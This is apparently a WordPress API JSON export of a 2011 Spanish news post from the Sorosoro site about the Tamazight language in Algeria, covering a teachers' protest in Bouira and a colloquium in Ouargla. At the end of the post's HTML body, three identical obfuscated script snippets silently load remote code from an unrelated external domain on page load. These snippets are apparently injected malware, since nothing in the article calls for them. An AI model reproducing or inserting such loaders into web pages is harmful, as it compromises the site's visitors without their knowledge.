{"id":59315,"date":"2011-10-15T19:31:53","date_gmt":"2011-10-15T17:31:53","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=59315"},"modified":"2025-10-21T22:18:20","modified_gmt":"2025-10-21T20:18:20","slug":"10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/","title":{"rendered":"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia"},"content":{"rendered":"<p style=\"text-align: justify;\">En la <strong>prensa argelina<\/strong> de los \u00faltimos d\u00edas, mucho se ha cuestionado el  lugar del <strong>tamazight<\/strong>, la variante <strong>kabil<\/strong> de la lengua bereber, y del concepto de \u00ab<strong><em>amazighit\u00e9<\/em><\/strong>\u00bb,<\/p>\n<p style=\"text-align: justify;\">De una parte, el diario <em>El Watan<\/em> tuvo en cuenta en su edici\u00f3n del <strong>11 de octubre<\/strong> la <strong>manifestaci\u00f3n de profesores de tamazight delante de la sede de la Direcci\u00f3n de la Educaci\u00f3n de Bouira, a 120 kms al sureste de Algeria<\/strong>.<\/p>\n<p style=\"text-align: justify;\">La ense\u00f1anza de la lengua, ciertamente, ha sido introducida en el sistema educativo en 1995, pero los medios otorgados resultan insuficientes, por lo menos en esta regi\u00f3n. Pues los manifestantes han reclamado la apertura de nuevos puestos presupuestarios y el aumento de manuales escolares en lengua amazigh. Tambi\u00e9n han lamentado la ausencia de estrategias de est\u00edmulo del sector y denotado \u00abel menosprecio de la tutela delante de sus quejas\u00bb.<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.elwatan.com\/actualite\/bouira-des-enseignants-de-tamazight-protestent-devant-la-direction-de-l-education-11-10-2011-143041_109.php\" target=\"_blank\">Para leer el art\u00edculo \u00edntegro<\/a> (en franc\u00e9s)<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Paralelamente, la <em>D\u00e9p\u00eache de Kabylie<\/em> regresa sobre un <strong>coloquio<\/strong> que se ten\u00eda en <strong>Ouargla<\/strong> (800 kms al sur de Algeria) los d\u00edas <strong>10 y 11 de octubre<\/strong>. Organizado por el HCA (Haut Commissariat \u00e0 l\u2019Amazighit\u00e9), este coloquio era titulado \u00ab\u00a0<strong>El componente amazigh en la identidad argelina: un inventario <\/strong>\u00bb.<\/p>\n<p style=\"text-align: justify;\">El objetivo aqu\u00ed era \u00ab\u00a0elaborar un cuadro psicol\u00f3gico, sociocultural, ling\u00fc\u00edstico y antropol\u00f3gico de la experiencia colonial\u00bb y los debates han girado esencialmente alrededor del rol de la lengua en la edificaci\u00f3n de la identidad.<\/p>\n<p style=\"text-align: justify;\">Uno de los participantes, Moussa Imazar\u00e8ne, maestro de conferencias en la universidad de Tizi Ouzou ha tratado, en particular, de la influencia del franc\u00e9s, lengua de la colonizaci\u00f3n en el tamazight: del pr\u00e9stamo de palabras del vocabulario en los cambios sint\u00e1cticos, incluso en una sustituci\u00f3n total.<\/p>\n<p style=\"text-align: justify;\">Para M. Gaouaou Manaa, profesor en la universidad de Batna, \u00abla lengua es el veh\u00edculo principal de la identidad\u00bb. Tambi\u00e9n ha insistido en la exactitud de la palabra \u00abtotalitarismo\u00bb para designar la situaci\u00f3n en una \u00e9poca donde \u00abestaba prohibido hablar en tamazight\u00bb.<\/p>\n<p style=\"text-align: justify;\">Este per\u00edodo visiblemente ha cumplido porque Moussa Imazar\u00e8ne ha destacado que desde ahora, la ense\u00f1anza en lengua bereber por mucho era el gran \u00e9xito de los candidatos de su regi\u00f3n Tizi Ouzou en los ex\u00e1menes del BAC.<\/p>\n<p style=\"text-align: justify;\">Al final, pues  fuerza  es constatar con el periodista que \u00ab aunque las reacciones de ostracismo en contra del hecho amazigh son todav\u00eda una legi\u00f3n, eso no impide que la afirmaci\u00f3n de la identidad amazigh sea desde ahora una realidad social y cultural en Argelia\u00bb.<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.depechedekabylie.com\/evenement\/100838-la-langue-est-le-vehicule-principal-de-lidentite.html\" target=\"_blank\">Para leer el art\u00edculo entero<\/a> (en franc\u00e9s)<\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>En la prensa argelina de los \u00faltimos d\u00edas, mucho se ha cuestionado el lugar del tamazight, la variante kabil de la lengua bereber, y del concepto de \u00abamazighit\u00e9\u00bb, De una parte, el diario El Watan tuvo en cuenta en su edici\u00f3n del 11 de octubre la manifestaci\u00f3n de profesores de tamazight delante de la sede [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-59315","post","type-post","status-publish","format-standard","hentry","category-noticias"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"En la prensa argelina de los \u00faltimos d\u00edas, mucho se ha cuestionado el lugar del tamazight, la variante kabil de la lengua bereber, y del concepto de \u00abamazighit\u00e9\u00bb, De una parte, el diario El Watan tuvo en cuenta en su edici\u00f3n del 11 de octubre la manifestaci\u00f3n de profesores de tamazight delante de la sede [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-10-15T17:31:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:18:20+00:00\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia\",\"datePublished\":\"2011-10-15T17:31:53+00:00\",\"dateModified\":\"2025-10-21T20:18:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/\"},\"wordCount\":447,\"articleSection\":[\"Noticias sobre los idiomas en peligro\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/\",\"name\":\"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-10-15T17:31:53+00:00\",\"dateModified\":\"2025-10-21T20:18:20+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/","og_locale":"es_ES","og_type":"article","og_title":"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia - Sorosoro","og_description":"En la prensa argelina de los \u00faltimos d\u00edas, mucho se ha cuestionado el lugar del tamazight, la variante kabil de la lengua bereber, y del concepto de \u00abamazighit\u00e9\u00bb, De una parte, el diario El Watan tuvo en cuenta en su edici\u00f3n del 11 de octubre la manifestaci\u00f3n de profesores de tamazight delante de la sede [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/","og_site_name":"Sorosoro","article_published_time":"2011-10-15T17:31:53+00:00","article_modified_time":"2025-10-21T20:18:20+00:00","author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia","datePublished":"2011-10-15T17:31:53+00:00","dateModified":"2025-10-21T20:18:20+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/"},"wordCount":447,"articleSection":["Noticias sobre los idiomas en peligro"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/","name":"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-10-15T17:31:53+00:00","dateModified":"2025-10-21T20:18:20+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/10\/10-11-de-octubre-de-2011-noticias-de-la-lengua-amazigh-en-argelia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"10-11 de octubre de 2011: noticias de la lengua amazigh en Argelia"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/59315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=59315"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/59315\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=59315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=59315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=59315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}